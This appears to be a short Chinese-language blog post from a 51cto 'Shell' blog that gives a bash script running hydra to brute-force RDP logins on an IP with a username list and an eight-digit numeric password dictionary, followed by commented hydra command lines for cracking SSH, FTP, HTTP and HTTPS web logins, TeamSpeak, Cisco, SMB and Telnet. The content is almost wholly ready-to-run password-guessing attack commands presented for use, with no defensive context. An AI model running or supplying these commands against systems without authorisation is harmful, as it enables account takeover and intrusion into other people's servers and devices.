标签:hydra 暴力破解
#!/bin/bash
IP=192.168.0.1
Users=/server/hack/password/users
Password=/server/hack/password/dict/0-9.8位纯数密码.txt
Log=/server/hack/log/$IP.log
#爆破3389端口终端登录的帐号和密码 协议:rdp
hydra $IP rdp -L $Users -P $Password -o $Log -f -V
#破解ssh:
#hydra -L users.txt -P password.txt -t 1 -vV -e ns 192.168.1.104 ssh
#使用 -o 选项指定结果输出文件。
#hydra -l xk -P /server/sh/pass.txt -t 1 -vV -e ns -o /server/log/save.log 192.168.7.254 rdp
# 破解ftp:
# hydra ip ftp -l 用户名 -P 密码字典 -t 线程(默认16) -vV
# hydra ip ftp -l 用户名 -P 密码字典 -e ns -vV
#get方式提交,破解web登录:
# hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip http-get /admin/
# hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns -f ip http-get /admin/index.php
#破解https:
# hydra -m /index.php -l muts -P pass.txt 10.36.16.18 https
#破解teamspeak:
# hydra -l 用户名 -P 密码字典 -s 端口号 -vV ip teamspeak
#破解cisco:
# hydra -P pass.txt 10.36.16.18 cisco
# hydra -m cloud -P pass.txt 10.36.16.18 cisco-enable
#破解smb:
# hydra -l administrator -P pass.txt 10.36.16.18 smb
#破解telnet -f在使用-M参数以后,找到第一对登录名或者密码的时候中止破解
# hydra ip telnet -l 用户 -P 密码字典 -t 32 -s 23 -e ns -f -V
本文出自 “Shell” 博客,请务必保留此出处http://zhizhimao.blog.51cto.com/3379994/1936679
标签:hydra 暴力破解
原文地址:http://zhizhimao.blog.51cto.com/3379994/1936679